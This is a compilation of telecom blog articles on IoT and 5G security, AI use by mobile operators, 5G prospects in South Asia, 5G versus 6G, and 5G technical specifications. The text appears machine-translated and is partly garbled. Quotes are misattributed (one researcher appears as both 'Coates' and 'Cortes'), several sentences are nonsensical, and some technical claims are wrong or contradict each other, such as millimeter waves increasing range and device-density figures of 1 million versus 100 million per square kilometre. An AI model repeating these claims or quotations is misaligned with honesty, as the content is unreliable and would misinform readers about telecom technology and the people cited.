2. Protect and Isolate Vulnerable Devices:

The next potential weakness is the device itself. Vans said, “There is a weak security awareness throughout the industry.” In particular, industrial equipment uses its own operating system and often does not have the ability to install patches, or patches are often prohibited under licenses. “It’s not designed with patches in mind,” Vans said.

Jonathan Tanner, senior security researcher at Barracuda Networks, said that the vast majority of IoT security mistakes haven’t been fixed, and some devices have problems that cannot be fixed by a firmware update, or that there is no mechanism to update the firmware. Even if device manufacturers add security to the next generation of devices, the older, unsafe devices will still be used.

Tanner disregards this and ignores security researchers who point out vulnerabilities. “There are cases where companies that make vulnerable devices go out of business. In this case, the vulnerable device is left untouched. ”

What should companies do with insecure IoT devices? Whirlpool’s Vans said using network isolation along with other network security technologies could help. Barnes said, “The whirlpool uses a two-tiered approach. The first layer is network security, which monitors all traffic, and the second layer is protocol-based security, looking for malicious activity embedded in the protocol through deep packet inspection. ”

In addition, general security hygiene applies, such as patching immediately above this layer, regular security audits for all devices, and inventorying all devices on the network.

3. Prepare for Larger DDoS attacks

In general, 5G is not less secure than previous generation wireless technologies. Kevin McNami, head of the Nokia Threat Intelligence Lab, said, “5G brings new security features that aren’t actually available in 4G or 3G. In 5G, the entire control plane is transferred to a Web services type of environment, which is strongly authenticated and very secure. “

This improvement is offset by increased opportunities for botnets,” McNami said. “In 5G, the bandwidth available to devices is significantly increased. As bandwidth increases, IoT bots will increase.” This bandwidth will of course increase. ”The

increased bandwidth can be used to find more vulnerable devices and spread the infection, increasing the number of vulnerable devices that the botnet can find. As Whirlpool says, companies use IoT devices a lot, as do other types of organizations, including government agencies, and

when 5G is deployed, they will be able to deploy the device in remote, difficult-to-maintain locations. Interest in the Oregon Wireless Internet Service Providers Union “A lot of sensors record everything from weather to air quality to video feeds,” says co-chairman Cameron Camp. “There’s a lot of new machines that are likely to be hacked and botnetized.” It will be difficult to find and respond to hacks. ”

IoT devices are also typically used for a long time. The user does not have to replace the device that performs the desired function well. Attackers prefer a stealthy approach in order not to draw attention. Even if a patch is released or a manufacturer releases a more secure version of the device, it’s useless if the customer doesn’t want to change it.

Many smart IoT devices, on the other hand, run a comprehensive operating system, such as embedded Linux, allowing them to behave almost like normal computers. It is therefore possible to use infected devices to host illegal content, malware, command control data and other useful systems and services for attackers. Users don’t consider these devices to be computers that need antivirus, patches, or updates. Many IoT devices do not keep logs for inbound and outbound traffic. It’s even harder to get rid of botnets because attackers can stay active without being caught.

Eventually, all three threats increase: the number of devices that can be exploited, the bandwidth available for botnet proliferation, and the bandwidth available for devices to launch DDoS attacks. Many devices are still unprotected and some cannot be patched at all, so in a 5G environment, companies must be prepared for a much larger DDoS attack than they are today.

4. Switching to IPv6 May Replace Private Internet Addresses with Public Addresses
As the number of devices increase and communication speeds improve, companies may want to use IPv6 instead of IPv4, which is now commonly used. IPv6, with longer IP addresses, has become an Internet standard since 2017.

The maximum number of available addresses for IPv4 addresses is 4.3 billion, which is not enough. Some registrars have faced address shortages since 2011 and organizations have begun their transition to IPv6 in 2012. But according to data from The Internet Society, less than 30 percent of current Google users access the Google platform via IPv6.

Nokia’s McNami said that many organizations, and nearly all home devices and many cell phone networks, use private IPv4 addresses instead of IPv6, “private IPv4 addresses are not exposed to the Internet, providing natural protection from attacks.”

As the world moves to 5G, carriers will have to switch to IPv6 to support billions of new devices. But if the carrier chooses a public IPv6 address rather than private, the device is exposed to the Internet. McNami said this isn’t an issue with IPv6 or 5G, but it could lead to a situation where companies that switch devices from IPv4 to IPv6 inadvertently leave them in the public address space.

5. Increased Attack Surface due to Edge Computing:

There is a growing interest in edge computing among customers or companies looking to reduce latency and improve performance for their distributed infrastructure. When 5G is deployed, the communication capabilities of endpoint devices are enhanced, further increasing the benefits of edge computing.

At the same time, edge computing also dramatically increases the potential attack surface. Companies that have not yet started their transition to zero-trust network architecture should look at this architecture before investing heavily in edge computing infrastructure. If you actually build a zero-trust network architecture, security should be treated as the most important consideration, not as a follow-up.

6. New IoT Companies Focus on Preoccupation, Not Security:

When the IoT gold rush begins, new players will enter the market and existing ones will launch new devices ahead of time. Barracuda’s Tanner says there are more IoT devices than security researchers already looking for vulnerabilities, and that new manufacturers will add new cycles of security mistakes.

Tanner notes that as the same mistake continues to occur, the number of vulnerabilities reported on IoT devices is not decreasing, but increasing. “There is not enough learning from events in other companies in the industry.”

“The company doesn’t care about security,” says Joe Coates, who focuses on corporate network intrusions, leading penetration testing at A-lign Compliance and Security. Earlier this year, I bought five devices related to the ability to turn the lights on and off, and I could access four of them outside the home. The test mode embedded in the device was released by the vendor without being removed. ”

Cortes said all companies want to enter the market first. Many companies use ready platforms such as embedded Linux to get devices to market as quickly as possible. Cortes said, “I recently got IoT malware that can bring a device down with seven lines of code.” Cortes said that manufacturers who do not tighten their devices are vulnerable.

For example, an attacker could use this malware to shut down a plant or critical infrastructure, or to hold a company’s system hostage and demand a ransom. “That’s not happening yet,” Cortes said. “5G is not widely deployed.” As 5G adoption increases and IoT increases, it is likely that exploitation of industrial systems, such as the manufacturing industry, will increase significantly. ”

7. Everyone is Responsible for IoT security:

The biggest obstacle to IoT security is psychological obstacles, not technology. Nobody wants to take responsibility. Everyone wants to pass on to someone else. The buyer accuses the vendor of not making the device secure. Vendors blame buyers for finding cheap, insecure products. Avoiding responsibility for IoT security in the 5G world leads to even greater wave lengths.

In a last year’s Radware survey, 34 percent of respondents said that the responsibility for IoT security rests with their device manufacturers, 11 percent with service providers, 21 percent with individual consumers, and 35 percent with business organizations. Mike O’Malley, vice president of strategy at Radware, said: “In other words, there is no consensus.” O’Malley also said that consumers have no knowledge or skills. Companies do not hire enough people. Manufacturers are so numerous and different that they are difficult to control.

Companies can hire service providers to take some of the responsibility off, but that doesn’t solve the problem of unprotected consumer devices, passive manufacturers in change, and the absence of consistent global regulations and enforcement.

Everyone should be responsible for IoT security. Buyers should ensure that their products do not use a default password or test mode, that communications are encrypted and authenticated, and that devices are regularly patched and updated. Vendors should stop selling unprotected devices and consider security at the start of the product design process, rather than adding features later.

Artificial Intelligence in Telecom – From Hype to Reality – AI

Artificial Intelligence in Telecom – From Hype to Reality – AI

Surprising Ways Telecom Companies Use Artificial Intelligence

AI is having enough hype through media, researchers and vendors. Innovative organizations are putting a lot of efforts in AI research to make full benefits of it.

We all know about Sophia a social humanoid robot developed by Hong Kong based company Hanson Robotics. She looks quite human like and has been in talk shows a lot. She has also been given citizen ship in Saudi Arabia as being first artificial intelligence based human robot. She is being consider as intelligent but in reality, she is thoughtless whose intelligence is very basic. She can read a manuscript, on stage can perform a speech and she can answer questions that are pre-programmed. But If we ask her question out of script she can’t answer. Why is it so? Why is the gap here?

Well there is a basic difference of implementation AI.

Artificial General Intelligence

Machines that almost same level of intelligence that humans have, are expected in AGI products. This is what we all are expecting.

Artificial Narrow Intelligence

Machines have ability to perform specific tasks extremely well. These are computers that are trained to do simple and basic level of tasks only more efficiently than that of humans. This ANI based products are more in utilization by industry now.  i.e a machine that is trained to identify objects in images

A computer that can identify brain tumor cannot detect tiger in a picture because it has not been trained on that.

And certainly that’s the kind of AI, organizations like Telecom operators are trying to implement.5G  , IoT and big data will be handled by Narrow AI models to perform small task efficiently and fast.

Operators can train AI models such that, input from big data and after processing give expected results about customers. Mobile operators are also training the network based on alarms to predict whether there will be a failure or not. We just need to in put this data to AI model to learn and give out put as per desired results. It will also learn the relationship that if a new related input is given then it can predict the answer.  Similarly a new customer is added then machine will learn that client will churn or not.

This is very basic application of AI today in mobile telecom industry.

One more interesting and quite effective application of AI in telecom is dynamic carrier allocation.

 Artificial Narrow Intelligence trained model can add or remove additional carrier based on learning from previous weeks trends using capacity. No more manual allocation and wastage of resources.

Another example of machine learning using AI is

Automatize Customer Care:

Machines are trained to identify patterns in the text and predict problems for better solution offers.  

This is pure automation, quick and competent customer support application.


Challenges that mobile operators are facing at the moment is, they are not having enough samples of issues to predict more accurately.Only those queries are addressed well where model is having high volume data.

These are very concrete examples that are being used in Telecom companies today.We are seeing that AI will be a part of all domains in near future to automate tasks and improve productivity whether in Network, Customer care, Marketing, HR or Finance etc.

How to Adapt AI in Mobile industry:

First of all companies need to upgrade the technology stakes, upgrade the infrastructure and competence to work with AI. Especially need to fix the first mile and last mile of AI.

1st mile means data readiness. To be able to collect, store, process to make available the data for training AI models.

Last mile is infrastructure on which AI based models work and utilization of predictions from AI models to operations.

So deploying AI in Telecom sector effectively, mobile operators needs to work on refine enough big data and then focus on applying outputs in business operations.

Key barriers that must be solved and must have things for AI readiness:

  • Agile data Access Processes.
  • Experimental platform with the right tool.
  • Culture for experimentation and failing.  
  • Domain and AI expert collaboration / cross function operational model
5G in South Asia: Opportunities & Challenges

5G in South Asia: Opportunities & Challenges

Imagine 5G in South Asia, 1.891 billion or about one fourth of the world's population, making it both the most populous and the most densely populated geographical region in the world.

Just a year after introducing 4G, the telecom sector in South Asia is turning its attention to move on to the era of 5G. While the gap between these two successive generations of mobile technologies seem quite narrow, 5G’s over-arching impact beyond voice and data has made it a must-have tool to keep South Asia  relevant in the 4th Industrial Revolution (Industry 4.0).

Unlike the earlier generations, 5G can bring more than an incremental change for an emerging economy of South Asia . Its underlying architecture has the potential to enable the next wave of productivity and innovation across the subcontinent – thanks to its gigabit speeds, improved network performance and reliability.

However, some of the most talked 5G uses-cases like autonomous vehicles and robotic surgery might not be applicable in context of South Asia. This is because, such futuristic use-cases requires advanced market structure and availability of digital and supporting economic infrastructure. Rather an improvised and contextual 5G would be more appropriate for the country largely driven by digitization and automation needs in the government and business sectors.

5G Overview
Unlike early generations of mobile networks, 5G will represent a significant shift in the telco industry’s focus away from voice and more towards mobile broadband and increased industrial applications. In other words, 5G will be use-case driven. Instead of rolling out a tower and offering voice and data services right away, 5G will solve problems across a range of sectors—including transportation, health, manufacturing and agriculture—using a combination of device, connectivity and application.

5G use cases can be divided into the following 3 categories: a) enhanced Mobile Broadband, b) massive Machine Type Communications, and c) Critical communications. Apart from these use-cases, 5G has the potential to allow tailoring of requirements for each of these use-cases categories within the same network.

Enhanced Mobile Broadband (eMBB)

eMBB is designed to provide an improved “Unlimited” mobile experience for consumers. Superfast 5G networks with peak data rate of >10 Gbps will enable consumers to view rich content in more places, supporting the streaming of live events and high-resolution media. Increased network capacity of 10,000 times compared to today’s networks will support more users, even in crowded areas, such as large public events, and at peak times providing at least 100 Mbps throughput per user.eMBB will likely be the focus of early 5G deployments as it can immediately support the growing communications requirements for an emerging digital economy like South Asia.

Massive Machine Type Communication (mMTC)

The mMTC will support widespread and dense deployment of sensors and other network-connected devices enabling massive Internet-of-Things (IoT) deployment, such as asset tracking, smart agriculture, smart cities, energy monitoring, smart home, remote monitoring. The mMTC will significantly reduce the power requirements (battery life of up to 10 years) and provide flexible coverage across different spectrum bands with the ability to support over 1 Million devices per Sq-km.

Ultra Reliable Low Latency Communication (URLLC)

The URLLC will take human-to-machine interaction to the next level offering sub-millisecond latency and ultra-reliable (i.e. 1 in a million) communications networks supporing the delivery of critical communications—playing role in the technology ecosystem supporting autonomous vehicles, smart grids, remote patient monitoring and telehealth, industrial automation.

5G Opportunities for South Asia

The 5G opportunities can be divided into 3 broader segments – Consumer, Business and Government.


Super-fast, yet affordable 5G networks shall bring new services and experiences to the 1.891 billion or about one fourth of the world’s population. The first wave of 5G deployments are envisaged to be primarily based on eMBB use-cases and shall provide unlimited mobile and home broadband experience for the consumers – far better than today’s 4G and WiFi connectivity. Through ultra-high speed and low-latency connections, consumers will be able to avail a broad-range of data-hungry services, such as HD streaming and gaming services, seamless video conferencing and sharing, as well as augmented reality (AR) and virtual reality (VR) services. All these services are expected to be availed keeping the same monthly budget, thanks to at least 10 times cost reduction from 4G to 5G based data services.


The eMBB services will also help the fledgling SME and Corporate businesses of the countries to migrate to Cloud supporting various cloud-based software, unified communication and conferencing needs. Using the mMTC, the companies in the RMG, Pharmaceuticals and FMCG sectors will be able to deploy various assembly line and supply chain automation techniques, which will significantly increase their efficiency. On the other hand, applications like asset tracking, logistics & workers’ safety will help the businesses to improve their productivity.


Perhaps, the most transformative impacts of 5G will be in the government sector for South Asia. 5G powered Smart Cities can implement use-cases like smart parking, smart waste-management, smart street-lights, smart public safety, etc and enable smart decision making and planning to optimize the quality of life for citizens and increase productivity.

5G can accelerate implementation of Smart Grid/Utilities in South Asia  to a great extent, enabling use-cases like smart metering, service quality monitoring, fault localization, automation and control, infrastructure management and demand management. The utilities can utilize these services to better manage between demand & supply, improve service quality & reliability, and ensure precision billing and revenue collection. On the other hand, customers can monitor and manage their consumption in near real-time and pay bills and get notified about alerts and outages through their smart phones.

Apart from the above, 5G can help government implement digitization and automation projects across several sectors like health, education and agriculture.

Key Challenges for 5G deployment in South Asia:

Despite many potential benefits, there are significant challenges exist to implement 5G and get the most out of it. Operators are skeptical about the business case given the high-levels of investment needed to deploy 5G networks, as well as its dependencies on device and apps ecosystem readiness. In such a scenario, actions from the policy-makers will make a great difference in facilitating a robust 5G investment case.

Some of these key challenges are outlined below:

Spectrum: The key features of 5G, i.e. speed, reliability and capacity mainly come from more and new bands of spectrum. Price and allocation modality of spectrum will play a major in the business cases of the 5G operators. With the current level of spectrum price, operators will hardly see any business case for immediate adoption of 5G in South Asia . Moreover, lots of clean-ups and harmonization are required in the 700 MHz, 3.5 GHz and 26-28 GHz bands to make them available for 5G deployment. Affordable access to these spectrum and a clear road map of their availability are the keys to encourage investments in 5G.

Infrastructure: Along with spectrum, easy and affordable access to infrastructure (poles and towers, antenna, fiber network) is also critically important to ensure 5G capacity and coverage. Hence, attention needs to be paid to reform some of the guidelines and arrangements related to authority policies, so that all players can offer their complementary assets and capabilities under a harmonized 5G infrastructure sharing guideline .

Policy: Unlike 2G/3G/4G, the use-case driven 5G technology require close engagements with devices and application developer communities, government agencies and telecom industry. Taxation regime for IoT sensors/devices and connectivity (e.g. SIM TAX, VAT/SD/SC) needs to be reformed to encourage proliferation of IoT applications. Cross-Industry collaboration is required to expedite national ICT projects, such as Smart City/Grid/Education/Health to prepare ground for 5G-based digitalization and automation projects. Also, right and pragmatic policies based on international best practices needs to be put in place for Cloud and Data Centers to cater for the ‘Data Tsunami’ that 5G will fuel.

Security: As 5G networks are expected to become the backbone of many critical national IT applications, such as Smart City, Smart Grids, Healthcare, etc. the integrity and availability of those networks will become major concerns and challenges from national security perspective. Due to its dependencies on devices and applications, risks related to major security flaws may significantly increase. For example, threats deriving from poor firmware and software development processes which make it easier for the hackers to maliciously insert back-doors into products and make them harder to detect. Hence, necessary security and data privacy policies and best practices needs to be in place, such as data encryption, device/software certification, network slicing, etc.


5G is expected to play a key role in an emerging economy of South Asia , improving economic growth, enhancing citizen experiences and creating new business opportunities. The implementation of 5G in South Asia  would be quite different than the rest of the world as, the most populous and the most densely populated geographical region , is leap-frogging from a completely analog to a digital economy bypassing the intermediary steps.

However, significant skepticism exists regarding the investment case of 5G, which needs to be addressed by carefully crafted spectrum, infrastructure, taxation and cloud hosting policies. This can reduce business uncertainties and create an encouraging investment environment for all 5G players, including operators, infrastructure providers, device vendors, developer community, and most importantly, government and business customers.

What is The Difference between 5G and 6G?

What is The Difference between 5G and 6G?

What is 6G? 5G vs 6G, Speed & More

In simple words, 6G is widely believed to be smarter, faster and more efficient than 5G. It promises mobile data speeds 100 times faster than 5G network currently available in limited countries. With speeds of up to 100 times of 100 gigabits per second, 6G is set to be as much as 100 times faster than 5G.

Future Technologies are Closer Than We Think | 6G

While operators are introducing 5G networks , developers have already begun active work on the development and creation of sixth-generation networks, or 6G. In particular, the Huawei announced that it has begun research on 6G — the successor to 5G mobile networks which are not yet widespread, according to its CEO Ren Zhengfei.
He said it’s in an “early phase” and there’s still “10 years to go” before commercialization.

It is now necessary to decide which frequency bands will be used and how they will be licensed by telecom companies. At the same time, the term 6G is still a symbol, because a single definition and even a standard still does not exist.

Tom Wheeler said: “I don’t care what to call it: millimeter waves, 6G or xyz. But we need to start discussions to solve these issues.”

“Nobody Knows How the 6G Standard Will Look Like”

Despite the uncertain standards, this does not mean that there are no real technologies – they already exist. For example, Samsung recently successfully tested wireless networks at about 7.5 Gb / s, which is about 30 times more than LTE, and about a thousand times more than the average fixed broadband user.

One of the main and fundamental differences of 6G technologies is the use of millimeter waves, which allow the use of high-energy frequencies. The use of such frequencies will dramatically increase not only the connection speed, but also the wave propagation range. However, this will increase the permeability of the network – the ability to envelop obstacles and bends of the landscape.

As per experts “Next-generation networks need to be seriously upgraded. How do you meet these requirements? You need to look into the distance. Very, very, far. To infinity and even further.”

It is believed that, theoretically, the 6G standard will increase the speed of wireless communications to 100 times faster than 5G. Currently, the best, fastest fixed fiber optic channels currently have a bandwidth of 100 Gbps. And 5G speeds will allow users to download movies in the Blue-Ray format in a split second. Then think about 6G.

5G standards will have to solve another problem, in addition to increasing speed: in the near future, not only smartphones, tablets and computers will be connected to the Internet; but also cars, household appliances, smart home systems, and much more. Consequently, telecommunications companies will need to significantly increase capacity not only in terms of bandwidth, but also in coverage. Now think about network, application using 6G, that will be 100 times faster than 5G.

According to Huawei, 5G networks will be fully available in 2020 for commercial use.

The process of developing Internet access technologies continues. It seems that recently began running networks 4G standard, the LTE , but experts from the company Huawei has been developing wireless 5G.
There is a possibility that already in 2020 there will be a shortage of network access speed and there will be a need for more modern data transfer technology, which will allow access to the network at speeds up to 10 Gbit / second at any point in the network. Of course, these are the maximum values of the transmission speed (in the incoming channel), in reality, the speeds will have lower values, as with all previous technologies , but the speed will be enough to satisfy any user requests.

5G Network Background

According to the forecasts of specialists from Huawei, which is one of the leaders in the development and production of equipment for organizing wireless networks (both 3G and 4G), the need for a new data transfer technology will arise very soon and by 2020 it is necessary to begin construction of 5G networks to satisfy all subscriber requests.
In the next decade, the number of mobile Internet users will increase many times, in connection with this there will be a lack of bandwidth and the inability to provide quality service, which is why modernization of existing data transfer technologies is necessary.
Today, subscribers of networks of the 3rd and 4th generations have a good or acceptable quality of the service provided . With an increase in the load on base stations, the throughput will noticeably decrease, therefore, it is necessary to expand the capacity or move to a new level, giving subscribers with the same capacities a better service at a higher access speed.
According to the head of the LKT Huawei (Laboratory for Communication Technologies), the entry into the 5G network market will attract many more subscribers to the connection. The emergence of services that require large bandwidth capabilities, such as video communications, which require a high data transfer rate for high-quality image transmission, as well as minimal delay between devices for a greater reality of presence.
5G networks, together with other existing computing technologies, will make the world even more mobile and truly affordable.


What is 5G? The Ultimate Guide Available on Internet

What is 5G? The Ultimate Guide Available on Internet

Everything You Need to Know About 5G

What is 5G?

Until recently, there were four generations of mobile communications in the world . Currently, operators, with the support of equipment suppliers (vendors), are actively testing the capabilities of fifth-generation networks, whose commercial expansion is expected by 2020. To explain this is quite simple: there is the so-called ten-year rule. If you look a little into the past, you can see that each new generation of mobile communications appeared about 10 years after the previous one: the first generation appeared in the early 80s, the second in the early 90s, the third in the early 00s, the fourth in 2009 year. The conclusion suggests itself that 5G commercial networks will begin to fill the world in 2020.

The fifth generation mobile communication standard (5G) is a new stage in the development of technology, which is designed to expand the possibilities of accessing the Internet through radio access networks.

The standardization of mobile networks of 2, 3, 4 and 5 generations is carried out by a partnership project for standardization of 3rd generation systems (3rd Generation Partnership Project, 3GPP)

In 2017, 3GPP officially announced that 5G will become the official name for the next generation of mobile communications and introduced a new official logo for the communications standard.

The tasks that 5G technology is designed to solve:

  • Mobile traffic growth
  • Increase the number of devices connected to the network
  • Reduction of delays for the implementation of new services
  • Lack of frequency spectrum

5G Network Services

  • Extreme Mobile Broadband (eMBB) – implementation of ultra-wideband communication with the aim of transmitting “heavy” content;
  • Massive Machine-Type Communications (mMTC) – support for the Internet of Things (ultra-narrowband)
  • Ultra-Reliable Low Latency communication (URLLC) – providing a special class of services with very low latencies

It is obvious that in the future much more devices will be connected to the network, most of which will work on the principle of “always online”. At the same time, their low power consumption will be a very important parameter.

5G Network Requirements

  • Network bandwidth up to 20 Gbit / s downlink (ie, to the subscriber); and up to 10 Gb / s in the opposite direction.
  • Support for simultaneous connection of up to 1 million devices / km 2.
  • Reducing the time delay on the radio interface to 0.5 ms (for the services of Ultra-Reliable Inter-Machine Communication URLLC) and up to 4 ms (for services of the Ultra-Wideband Mobile Communication eMBB).

Potential 5G Technology

1) Massive MIMO
MIMO technology means using multiple antennas on transceivers. The technology, successfully applied in fourth-generation networks, will find application in 5G networks. Moreover, if MIMO 2×2 and 4×4 are currently used in networks , then in the future the number of antennas will increase. This technology has two weighty arguments for application at once: 1) the data transfer rate increases almost proportionally to the number of antennas, 2) the signal quality improves when a signal is received by several antennas at the same time due to diversity reception ( Receive Diversity ).

2) Transition to the centimeter and millimeter ranges: Currently, LTE networks operate in frequency ranges below 3.5 GHz. For the full functioning of 5G mobile networks, it is necessary to deploy networks in more free high-frequency ranges. With an increase in the frequency at which information is transmitted, the communication range decreases. This is the law of physics, you can get around it only by increasing the transmitter power, which is limited by sanitary standards. However, it is believed that the base stations of the fifth generation networks will be denser than now, due to the need to create a much larger network capacity. The advantage of the tens of GHz bands is the presence of a large amount of free spectrum.

3) Multi-technology
To provide high-quality service in 5G networks, it is necessary to support both existing standards, such as UMTS , GSM , LTE , and others, for example, Wi-Fi. Base stations using Wi-Fi technology can be used to offload traffic in especially busy places.

4) D2D (Device-to-device)
Device-to-device technology allows devices located close to each other to exchange data directly, without the participation of the 5G network, through the core of which only signal traffic will pass. The advantage of this technology is the ability to transfer data transfer to the unlicensed part of the spectrum, which will further offload the network.

5) The new radio interface in 5G networks and other innovations.

What will 5G mobile networks be?

What will be 5G mobile networks? Technical innovations: virtualization, radio interface, Massive MIMO, Spectrum sharing, New Full Duplex and others

Mobile technology has firmly entered our lives and continues to strengthen its position. Mobile networks are operator networks that provide voice and Internet access on the one hand, and on the other hand a diverse range of gadgets, sensors and smart devices: from smart trackers in the present to smart coffee makers, cars and entire cities in the near future .

According to the rule of 10 years, every decade a generation of mobile communications is replaced . But even one standard within 10 years does not stand still. For example, the fourth generation is classified by LTE , LTE-A ; the WiMAX ; 4,5G and others. If you rely on the rule, there are still about three to four years for 4G dominance . At the same time, information about innovations for 5G networks and testing of pre-5G networks is increasingly appearing . Some vendors and operators receive ambitious statements to deploy them during 2018-2020.

To date, official 5G standards have been formed. Leading players in the global telecommunications market, including Qualcomm, Huawei, Ericsson, Verizon, AT&T, Nokia and others, offer their concepts for future networks by testing their prototypes.

The key feature of each generation, which is announced first of all, is the data transfer rate. However, this is not the only characteristic. Taking into account the development of the Internet of things and, as a result, an increase in the number of connected devices, as well as with an ever-increasing volume of consumed traffic, the following requirements for the fifth generation are defined:

  • Network bandwidth over 10 Gb / s.
  • Support for simultaneous connection of up to 100 million devices / km 2.
  • Data transfer delay no more than 1 ms.
  • The distribution between the various services of the required frequency resource.

Virtualized Architecture 5G

Software-Defined Networks ( SDN ) can become an effective technology that will reduce operator equipment and simplify infrastructure maintenance . SDN promotes the digital transformation of companies and the transfer of services to the cloud. The fundamental principle of Software-Defined Networks is remote control of the network and data transmission devices, i.e. programmatically.

In turn, it is assumed that in the optimization of network functions NVF (Network Functions Virtualization) will virtualize the various functions of many network elements of mobile operators, as well as implement a “network on demand”. Those. data will be processed and stored in a virtual environment (“in the cloud”). The classic equipment will retain the function of transmitting user traffic. This approach to fifth-generation networking meets the trends in wireless connectivity, namely convergence. Convergence involves the integration of isolated network objects into a single computing complex. This is also important for smart devices in order to exchange information online.

To organize a specific part of the network, operators use already developed solutions with a set of necessary parameters and specific equipment. Virtualization of 5G and networks “on demand” will allow you to pre-arrange servers and DATA centers for operators, i.e. will provide a “boxed” solution for them, significantly reducing the time and financial costs of introducing new services.

Regarding the network architecture in the fifth generation there are three “cloud” whales that provide its work.


Access cloud


Cloud management


Transport cloud

– organization of distributed and centralized technologies

– organization of access systems

– 5G compatibility with 3G and 4G

– session management

– mobility management

– service quality management

– physical data transfer

– ensuring network reliability and speed

– load balancing

Improved radio interface for 5G networks

5G radio interface modelOne of the obstacles to starting 5G is the lack of frequency spectrum. It is assumed that in future networks the resource will expand, including due to the millimeter range. The problem of network coverage and accessibility is supposed to be solved by targeting subscribers, that is, the radio coverage of the network will be adjusted to the needs of subscribers, unlike previous standards.

The efficiency of the fifth generation radio interface will be tripled, i.e. It will skip up to 3 times more data with the same bandwidth. Expected rate: 6 bps at 1 Hz.

For example, as candidates for the title of the 5G radio network interface, Huawei offers the following technical solutions:

1. SCMA (Sparse Code Multiple Access).
This is a low-cost code-based subscriber separation method that does not require delivery confirmation. It works as follows. Before broadcasting over the radio interface, bytes streams of different subscribers from one frequency resource are converted into a codeword using the so-called codebook . The signal recovery at the receiving side is also performed using the codebook.

2. F-OFDM (Flexibel OFDM).
F-OFDM will provide its own set of parameters for each task due to the flexible decomposition into subcarriers, the use of different symbol lengths and the changing value of the cyclic prefix. F-OFDM is an enhanced version of OFDM

3. Polar Code – technology with sub-squared coding complexity.
It is a linear correction code based on the phenomenon of channel polarization.

Polar codes will increase the frequency spectrum by 3 times, allow decoding of linear complexity and significantly increase the data transfer rate.

Related Technologies:A number of other technologies are called upon to create a more perfect and qualitatively different infrastructure of 5G networks. Among them, Massive MIMO, which allows transmitting up to 8 data streams to one subscriber. Massive MIMO is a complex of several antennas that will form very sharp radiation patterns. The multi-beam technology will improve the level of the received signal and eliminate interference from other subscribers, which will positively affect the network bandwidth and the efficiency of using the frequency spectrum.

Bright directions of the concept of the Internet of things are the interaction of M2M (machine-to-machine interaction, Eng. Machine-to-Machine, M2M ) and D2D (device-to-device, Eng. Device to Device ). M2M technology is necessary for the interaction of devices among themselves without the direct participation of a person, i.e. to automate processes. The scope of M2M is quite wide. For example, in payment terminals, security systems, and vehicle coordination systems. Technology reduces the cost of processes, as well as minimizes their dependence on the human factor, and allows you to quickly respond to malfunctioning systems.

Specifications 5G. Comparison of 4G and 5G

  • 5G mobile communication technology has the following characteristics:
  • Increase the peak speed to 20 Gbit / s downlink (i.e. from the base station to the mobile); and up to 10 Gb / s in the opposite direction.
  • The growth of practical speed per subscriber to 100 Mbps or more.
  • Increase in spectral efficiency in 5G networks by 2-5 times. On the downlink: 30 bit / s / Hz, on the uplink – 15 bit / s / Hz.
  • Increasing energy efficiency by 2 orders. This will allow the Internet of Things devices to work without recharging the battery for 10 years;
  • Reducing the time delay on the radio interface to 0.5 ms (for the services of Ultra-Reliable Inter-
  • Machine Communication URLLC) and up to 4 ms (for services of the Ultra-Wideband Mobile Communication eMBB).
  • Increase in speed of subscriber movement up to 500 km / h.
  • Increase in the total number of connected devices to 1 million / km 2 .

5G Services

  • The main services that require the creation of a new generation of mobile communication networks are as follows:
    ultra-wideband mobile communication (enhanced Mobile Broadband, eMBB),
    ultra-reliable Low Latency Communication (URLLC),
    mass machine communication (Massive Machine-Type Communications, mMTC).
  • The importance of each of the key 5G capabilities for xMBB, uMTC, and mMTC usage scenarios is given in the book Mobile Communications Toward 6G . The degree of importance is estimated by three approximate indicators: “high”, “medium” and “low”.
  • In scenarios for eMBB, the following are of high importance:

-practical user data transfer rate,

– traffic per unit area,

– peak data rate,

– mobility,

– energy efficiency

– spectrum efficiency.

In some URLLC scenarios, low latency is high to ensure that critical security services work [see ch. 14.7 of the book “ Mobile communications on the way to 6G ”], as well as a high level of mobility in the field of transportation safety services.

MMTC scenarios are characterized by a high density of connections and the need to maintain the correct functioning of a large number of devices on the network. To implement this scenario, the low cost of the device and its energy efficiency are important.

Services in 5G networks can also be classified by the provided content for subscribers:

  • Multimedia services: video in 4K, 8K resolution, 3D-video, online games, services based on holograms and multimedia with the full effect of presence;
  • Cloud services: file storage, government services, business applications;
  • virtual reality services (Virtual Reality, VR);
  • Augmented Reality (AR) services: healthcare, military, education, entertainment;
  • Big Data Intelligent Services in order to improve business efficiency (business intelligence, BI), as well as operation and network management (network intelligence, NI);
  • Internet of Things (IoT) services based on mass connection of devices: energy, transport, healthcare, trade, public safety, industry, housing and communal services.
  • Ultra-low latency services: control of robotic mechanisms, telemedicine, unmanned vehicles, 3D games.

5G Speed

A significant increase in throughput and practical data transfer speed will require a significant expansion and increase in spectrum utilization, as well as an extremely high density of connections, which is unattainable for LTE / LTE-A standards even if they are improved.

Thus, the implementation of fifth-generation networks, especially the increase in data transfer rates, will require a significant increase in the frequency resource. One solution to this problem is frequency refarming – the procedure for replacing the used radio technology with the radio frequencies allocated to the telecommunications operator. For example, in agreement with the regulator, the launch of eNodeB LTE at frequencies allocated to the operator under a 2G or 3G radio network.

This spectrum will not be enough for 5G ultra-fast services, a new spectrum is needed in the bands above 6 GHz. So, at the World Radio Conference in 2019 ( WRC -19), it is planned to allocate additional frequency ranges above 6 GHz for mobile communications.

Fifth generation (5G) mobile networks will be characterized by high speeds (up to 20 Gbit / s downlink and up to 10 Gbit / s uplink).

It is also expected that real speed per subscriber will increase to 100 Mbit / s and more.

The above values ​​of speed increase will be achieved by increasing the spectral efficiency of 5G networks by 2-5 times in comparison with fourth-generation networks. This, in turn, will be available through the use of the following technical solutions:

– Massive MIMO

– Use of the new version of the radio interface New Radio

– Wider bandwidth

5G Frequency Bands

At what frequencies 5G networks will work ? This issue is especially acute, since the implementation of fifth-generation networks, especially increasing data transfer rates, will require a significant increase in the frequency resource. Here are the main approaches.

Frequency Refarming
One solution to this problem is frequency refarming – the procedure for replacing the used radio technology with the radio frequencies allocated to the telecommunications operator. For example, in agreement with the regulator, the launch of eNodeB LTE at frequencies allocated to the operator under a 2G or 3G radio network.

Use of unlicensed frequency bands
Within the framework of 5G networks, it is also planned to actively use unlicensed frequency bands, in particular frequency bands in the 5 GHz band

Using high frequency ranges
Nevertheless, a transition to the region of higher frequencies is considered more promising . The main point when choosing frequency bands at the national level (including use in the Russian Federation) is to ensure the use of 5G networks harmonized with international standards, and for this, accordingly, it is necessary to search at the international level for such frequency bands that would be slightly loaded at the national level level.

